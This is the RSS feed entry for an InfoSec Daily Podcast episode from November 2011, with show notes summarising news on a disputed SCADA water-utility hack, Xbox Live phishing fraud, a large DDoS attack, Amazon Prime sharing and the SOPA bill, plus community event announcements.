<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Tuesday, the Department of Homeland Security said it could not confirm a report from an Illinois intelligence fusion center which stated that an Illinois water utility had been hacked. The DHS and FBI had been working with the Curran-Gardner Public Water District in Springfield, Ill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier, the Illinois Statewide Terrorism and Intelligence Center had reported an attack from a Russian IP address. The report said that by accessing a SCADA (supervisory control and data acquisition) system, the hackers had burned out a water pump at the facility.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The statement, by DHS spokesman Chris Ortman, said:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;After detailed analysis, DHS and the FBI have found no evidence of a cyber intrusion into the SCADA system of the Curran-Gardner Public Water District in Springfield, Illinois. There is no evidence to support claims made in initial reports&#8211;which were based on raw, unconfirmed data and subsequently leaked to the media&#8211;that any credentials were stolen, or that the vendor was involved in any malicious activity that led to a pump failure at the water plant. In addition, DHS and FBI have concluded that there was no malicious traffic from Russia or any foreign entities, as previously reported. Analysis of the incident is ongoing and additional relevant information will be released as it becomes available.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Authorities are now investigating a claim that a hacker broke into computers that run a South Houston, Texas water system. pr0f said he hacked into the system because he was dismayed that the DHS downplayed the Illinois incident. He later added that the Texas system had been protected with only a</span><a href="http://www.allvoices.com/contributed-news/10923069-hacked-scada-system-had-been-secured-with-only-a-three-character-password"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">three character password</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Joe Weiss, the security expert who first took note of the Illinois Statewide Terrorism and Intelligence Center report, titled, &quot;Public Water District Cyber Intrusion,&quot; was suspicious of the DHS&#39; conclusions. He said,</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This smells to high holy heaven, because when you look at the Illinois report, nowhere was the word preliminary ever used. It was just laying out facts. How do the facts all of a sudden all fall apart?&rdquo;</span></p>
<p>	<a href="http://pastebin.com/wY6XD97L"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/wY6XD97L</span></a><br />
	<a href="http://pastebin.com/TgRTgrAK"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/TgRTgrAK</span></a><br />
	<a href="http://pastebin.com/HLNB6SAZ"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/HLNB6SAZ</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://reviews.cnet.com/8301-18438_7-20024644-82/amazons-free-shipping-secret"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://reviews.cnet.com/8301-18438_7-20024644-82/amazons-free-shipping-secret</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Want free two-day shipping on Amazon but don&#39;t want to pay for it? Well, if you know the right person, you don&#39;t have to.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s right, last year around the holidays I offered up a little Amazon Prime tip for folks planning to do a lot of last-minute online shopping on Amazon.com. Now, with the holidays approaching again and a lot of people interested in the</span><a href="http://reviews.cnet.com/tablets/amazon-kindle-fire/4505-3126_7-35022491.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kindle Fire</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, I thought I should update the story with some additional info.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Here&#39;s the deal. If you own or are considering purchasing an</span><a href="http://www.amazon.com/prime"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Prime</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> membership ($79 for the year), which enables you to get free two-day shipping on a whole host of items in Amazon&#39;s catalog, you can actually share your Prime membership with up to four &quot;household&quot; members. A lot of people don&#39;t know about this option because it&#39;s buried in the settings menu under &quot;Your Account.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To get there, just click on your &quot;Your Account&quot; (it&#39;s a little link in the top-right corner of your screen when you sign into Amazon). Look at the &quot;Settings&quot; section, and find &quot;Manage Prime Membership.&quot; Once you click on that, you&#39;ll be able to send invitations to folks you&#39;re close to. You just select your relationship, and enter an e-mail address and a birthday of the recipient to send out the invitation.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, some people balk at paying $79 for Amazon Prime, but if you could share the cost with a roommate or just want to be a generous family member, it starts to look like one of the great bargains, especially if you use Amazon a lot. Also, if you&#39;re a student, you can pick up six months of Prime with</span><a href="http://www.amazon.com/gp/student/signup/info"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Student</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (just enter a .edu address to get your free six months).</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s worth mentioning that Amazon additionally has a program called</span><a href="http://www.amazon.com/gp/mom/signup/info"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Amazon Mom</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. As one reader pointed out in the comments section, the program, which is not gender specific (dads can use it as a primary caregiver), gives you three months of free Prime membership, and for every $25 you spend on &quot;baby&quot; items, you get another month free. Alas, Amazon Mom is currently </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">closed</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to new members (you can add your name to a wait list).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3320374/microsoft-denies-xbox-live-has-been-hacked"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3320374/microsoft-denies-xbox-live-has-been-hacked</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has denied that accounts belonging to Xbox Live users have been hacked.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reports began surfacing this week that users of the online gaming service from Microsoft for the Xbox console were finding charges on their credit or debit cards for Microsoft Points, the currency used within the service. The purchases were for Microsoft Points, which allow Xbox Live users to buy extra games, add-ons and in-game items. It is thought the Microsoft Points that were obtained fraudulently had been used to buy extra content for a number of EA Sports games including FIFA 12, Madden and NBA.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This has lead to speculation that the tech giant had suffered at the hands of hackers, in the same way Sony did earlier this year, when the account details of 77 million users of the PlayStation Network were obtained by cybercriminals.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, Microsoft has denied this is the case and has instead blamed a phishing scam.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In this case, a number of Xbox Live members appear to have recently been victim of malicious &#39;phishing&#39; scams (i.e. online attempts to acquire personal information such as passwords, user names and credit card details by purporting to be a legitimate company or person),&quot; Microsoft said.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;&nbsp;</span><a href="http://news.cnet.com/8301-30686_3-57329081-266/is-facebook-building-its-own-phone"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30686_3-57329081-266/is-facebook-building-its-own-phone</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rumors of a &quot;Facebook phone&quot; are back in the news with a story from the technology Web site</span><a href="http://allthingsd.com/20111121/the-facebook-phone-its-finally-real-and-its-name-is-buffy/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">AllThingsD</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which reports that the social-networking company is working with a cell phone manufacturer to build it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rumor of a Facebook phone, or a smartphone with deeply integrated Facebook social-networking tools in it, first emerged a little more than a year ago. Back then, CNET had confirmed the social network had reached out to hardware manufacturers and carriers seeking input on a Facebook-branded phone. But rumors faded as devices with Facebook buttons were announced this year. Now it looks like Facebook may have revised its plans to build its own phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Monday, the AllThingsD Web site reported that Facebook is working with cell phone maker HTC to build a smartphone with the Facebook social-networking technology built into the core of the device. The new phone is code-named &quot;Buffy&quot; after the television show about a vampire slayer. The phone will be based on a modified version of Android, which has been tweaked by Facebook so that its services are deeply integrated, AllThingsD reported, citing unnamed sources.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3320263/asian-company-hit-by-mega-ddos-attack"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3320263/asian-company-hit-by-mega-ddos-attack</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DDoS criminals are trying to batter down DDoS defences with larger attacks and new techniques, mitigation outfit Prolexic has said, only weeks after the company detected a huge assault on an Asian company.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack on the unnamed organisation and its DNS provider happened between 5 and 12 November and reached 45Gbit/s at peak, equivalent to 69 million packets or 15,000 connections per second, way above the level that can be easily stemmed using standalone appliances, the company claimed.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The assault was sustained over nearly eight days in four different waves, focussing on the vulnerable application layers, a clear attempt to knock the business offline.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This attack was three times larger in packets per second volume than the biggest attack Prolexic has mitigated previously,&shy;&shy;&shy; which also occurred in 2011&rdquo; said Prolexic CTO, Paul Sop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What is new is that the attackers had tried to hit the DDoS defences, which suggests sophistication; attackers assumed that the organisation would have some defences in place that needed to be overcome. </span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://news.cnet.com/8301-31921_3-57329001-281/how-sopa-would-affect-you-faq"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-31921_3-57329001-281/how-sopa-would-affect-you-faq</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When Rep. Lamar Smith announced the Stop Online Piracy Act last month, he knew it was going to be controversial.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the Texas Republican probably never anticipated the broad and fierce outcry from Internet users that</span><a href="http://thomas.loc.gov/cgi-bin/bdquery/z?d112:h.r.03261:"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SOPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> provoked over the last week. It was a show of public opposition to Internet-related legislation not seen since the 2003 political wrangling over implanting copy-protection technology in PCs, or perhaps even the blue ribbons appearing on Web sites in the mid-1990s in response to the Communications Decency Act.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To learn how</span><a href="http://thomas.loc.gov/cgi-bin/bdquery/z?d112:h.r.03261:"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">SOPA</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, and its Senate cousin known as the Protect IP Act, would affect you, keep reading. CNET has compiled a list of frequently asked questions on the topic:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What&#39;s the justification for SOPA and Protect IP?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Two words: rogue sites. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Who&#39;s opposed to SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Much of the Internet industry and a large percentage of Internet users. An informal poll of its readership by BetaNews</span><a href="http://betanews.com/2011/11/20/you-oppose-congress-kill-free-speech-on-the-internet-act/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">found</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that 95 percent oppose SOPA. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: How would SOPA work?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It allows the U.S. attorney general to seek a court order against the targeted offshore Web site that would, in turn, be served on Internet providers in an effort to make the target virtually disappear. It&#39;s kind of an Internet death penalty. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: How is SOPA different from the earlier Senate bill called the Protect IP Act?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Protect IP targeted only domain name system providers, financial companies, and ad networks&#8211;not companies that provide Internet connectivity. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What are the security-related implications of SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One big one is how it interacts with the domain name system and a set of security improvements to it known as DNSSEC.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: What will SOPA require Internet providers to do?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A little-noticed portion of the proposed law, which CNET highlighted on Friday, goes further than Protect IP and could require Internet providers to monitor customers&#39; traffic and block Web sites suspected of copyright infringement. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Are there free speech implications to SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SOPA&#39;s opponents say so&#8211;a New York Times op-ed</span><a href="http://www.nytimes.com/2011/11/16/opinion/firewall-law-could-infringe-on-free-speech.html?_r=3"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">called it</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> the &quot;Great Firewall of America&#8211;and the language of the bill itself is quite broad. Section 103 says that, to be blacklisted, a Web site must be &quot;directed&quot; at the U.S. and also that the owner &quot;has promoted&quot; acts that can infringe copyright. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Q: Who supports SOPA?</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The three organizations that have probably been the most vocal are the MPAA, the Recording Industry Association of America, and the U.S. Chamber of Commerce. A Politico</span><a href="http://www.politico.com/news/stories/1111/68448.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">chart</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> shows that Hollywood has outspent Silicon Valley by about ten-fold on lobbyists in the last two years. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-530-all-your-dna-scada-hacked-amazon-shipping-xbox-live-hacked-facebook-phone-mega-ddos-and-sopa-faq/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3192/0/infosec-daily-podcast-episode-530.mp3" length="26583394" type="audio/mpeg" />
		<itunes:duration>0:55:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In orde[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 530 for November 23, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	No Show on Thursday (11/24) or Friday (11/25). &#160;
	In order to allow our hosts to enjoy the Holiday and spend time with their families we will not have any shows on Thursday (11/24) or Friday (11/25). &#160;Dr. Bonez will have his weekend show on 11/26 9PM EST. &#160;The normal show will return on 11/28.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://moneyland.time.com/2011/10/27/now-credit-card-companies-want-your-dna/
	All Your DNA Are Belong To Us
	&#8220;According to a Visa patent application published in April, the company sees potential to use a wide array of personal details to create profiles that could be used for ad targeting well beyond shopping details. It describes the possibility of also using &#8220;information from social network websites, information from credit bureaus, information from search engines, information about insurance claims, information from DNA databanks,&#8221; and other sources.&#8221;
	&#8230;
	-thanks to Ciphersson for this story
	Source: &#160;http://www.allvoices.com/contributed-news/10935252-dhs-says-illinois-water-utility-wasnt-hacked
	On Tuesday, the Department of Homeland Security said it could not confirm a report from an Illinois intelligence fusion center which stated that an Illinois water utility had been hacked. The DHS and FBI had been working with the Curran-Gardner Public Water District in Springfield, Ill.
	Earlier, the Illinois Statewide Terrorism and Intelligence Center had reported an attack from a Russian IP address. The report said that by accessing a SCADA (supervisory control and data acquisition) system, the hackers had burned out a water pump at the facility.
	The statement, by DHS spokesman Chris Ortman, said:
	&#34;After detailed analysis, DHS and the FBI have found no evidence of a cyber intrusion into the SCADA system of the Curran-Gardner Public Water District in Springfield, Illinois. There is no evidence to support claims made in initial reports&#8211;which were based on raw, unconfirmed dat[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
